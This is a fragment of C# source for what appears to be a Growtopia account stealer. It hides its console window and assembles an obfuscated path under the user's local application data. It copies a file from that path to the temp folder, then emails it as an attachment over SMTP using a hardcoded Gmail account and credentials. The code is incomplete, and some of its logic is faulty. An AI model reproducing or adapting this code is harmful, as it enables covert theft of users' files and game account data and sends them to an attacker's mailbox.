using System.Runtime.InteropServices;
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
private static extern IntPtr GetConsoleWindow();
static void Main(string[] args)
hwnd = GetConsoleWindow();
ShowWindow(hwnd, SW_HIDE);
string sarr = "\\" + gx + ax + fd + dc + cv + fd + xd + ks + df + "\\";
string kek = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
string root = kek + sarr;
string des = System.IO.Path.GetTempPath();
string sor = az + gz + gh + fs + kk + za + df + cv;
string sors = System.IO.Path.Combine(root, sor);
string dz = System.IO.Path.Combine(des, desn);
if (!System.IO.Directory.Exists(des))
System.IO.Directory.CreateDirectory(des);
System.IO.File.Copy(sors, dz, true);
us = "gr0wt0p1ahax0r69@gmail.com";
string lsa = p1 + p2 + p3;
MailMessage message = new MailMessage(fr, to, sub, boy);
SmtpClient smtp = new SmtpClient(lsa, ka);
smtp.Credentials = new NetworkCredential(us, pa);
if (dz != string.Empty || dz != null)
Attachment attach = new Attachment(ksa);
message.Attachments.Add(attach);